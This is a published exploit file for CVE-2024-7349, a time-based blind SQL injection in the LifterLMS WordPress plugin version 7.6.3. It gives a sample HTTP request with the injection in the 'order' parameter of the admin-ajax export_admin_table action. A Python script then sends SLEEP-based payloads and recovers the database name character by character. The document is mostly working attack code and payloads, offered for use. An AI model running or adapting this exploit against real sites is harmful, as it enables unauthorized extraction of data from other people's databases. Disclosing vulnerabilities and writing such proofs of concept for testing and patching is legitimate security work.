# Exploit Title: LifterLMS - Blind SQL Injection
# Date: 09/2024
# Exploit Author: FURKAN KARAARSLAN
# Category: Webapps
# CVE : CVE-2024-7349
# Version: 7.6.3
# Vendor: https://lifterlms.com/
# Remotely Exploitable: Yes
# Authentication Required: Yes
# CVSSv3.1 Score: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
# Details: https://www.byresearchers.net/2024/09/cve-2024-7349-lifterlms-775.html
############################################################################
# Request:
# POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
# Host: 127.0.0.1
# Content-Length: 168
# Accept: application/json, text/javascript, */*; q=0.01
# Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# X-Requested-With: XMLHttpRequest
# sec-ch-ua-mobile: ?0
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
# Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
# Cookie: wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5Zeq;
# Connection: close
#
#action=export_admin_table&handler=Students&page=1&order=ASC,sleep(5)&orderby=name&filter=&filterby=course_membership&search=&#per_page=25&_ajax_nonce=98cedbc865&post_id=
############################################################################
#Exploit Code
import requests
import time
url = "http://127.0.0.1/wordpress/wp-admin/admin-ajax.php"
headers = {
"Host": "127.0.0.1",
"Content-Length": "168",
"sec-ch-ua": '"Not-A.Brand";v="99", "Chromium";v="124"',
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"sec-ch-ua-mobile": "?0",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36",
"sec-ch-ua-platform": '"Windows"',
"Origin": "http://127.0.0.1",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "http://127.0.0.1/wordpress/wp-admin/admin.php?page=llms-reporting",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
"Cookie": "wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7Ced0ece46aaebda96ea02600b26a591f260ecdb2ec7eec146285e45b994b19c0e; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7C24f5e9d7acbb1e7915b89f9375a0298dfabcd5d08f0f226d3831b46abdb27f11; wp_llms_session_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C%7C1718239319%7C%7C1718235719%7C%7C8ce81de66404741005a03ee3e5b747e1; wp-settings-time-1=1718217826",
"Connection": "close"
}
def find_db_name():
db_name = ""
for i in range(1, 21):
for c in range(32, 127):
payload = f"action=export_admin_table&handler=Students&page=1&order=ASC,(SELECT IF(ASCII(SUBSTRING(DATABASE(),{i},1))={c},SLEEP(2),0))&orderby=name&filter=&filterby=course_membership&search=&per_page=25&_ajax_nonce=98cedbc865&post_id="
start_time = time.time()
response = requests.post(url, headers=headers, data=payload)
end_time = time.time()
if end_time - start_time > 2:
db_name += chr(c)
print(f"Found character: {chr(c)} at position {i}")
break
return db_name
database_name = find_db_name()
print(f"Database name: {database_name}")